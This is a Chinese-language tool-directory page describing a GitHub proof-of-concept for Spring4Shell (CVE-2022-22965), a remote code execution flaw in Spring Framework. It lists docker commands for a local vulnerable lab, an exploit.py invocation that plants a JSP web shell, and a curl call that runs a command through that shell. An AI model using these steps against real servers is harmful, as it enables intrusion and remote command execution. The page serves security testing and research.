Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-22965 — Spring Framework在JDK 9+上通过数据绑定实现RCE / spring4shell / CVE-2022-22965 | Kitploit
工具/GitHubGitHub/me2nuk/cve-2022-22965
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubme2nuk/cve-2022-22965

CVE-2022-22965

Spring Framework在JDK 9+上通过数据绑定实现RCE / spring4shell / CVE-2022-22965

查看仓库
14824年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Spring4Shell(CVE-2022-22965)

Spring Framework 在 JDK 9+ 上通过数据绑定导致的远程代码执行漏洞 / spring4shell / CVE-2022-22965

Spring4Shell(CVE-2022-22965) 漏洞利用演示

https://user-images.githubusercontent.com/57348147/161458377-44ab2f76-f947-4599-aa0a-92cbaac819f8.mp4

构建

root@kitploit:~
docker pull me2nuk/cves:2022-22965
docker run -it -p 8080:8080 --name=spring4shell me2nuk/cves:2022-22965

漏洞验证代码

root@kitploit:~
python3 -m pip install -r requirements.txt
python3 exploit.py --url="http://localhost:8080/exploit/greeting" --dir="webapps/ROOT" --file="cmd"
curl http://localhost:8080/cmd.jsp?cmd=id

参考资料


  • https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
  • https://github.com/tweedge/springcore-0day-en/blob/main/ANALYSIS_EN.md
  • https://github.com/lunasec-io/Spring4Shell-POC
下载工具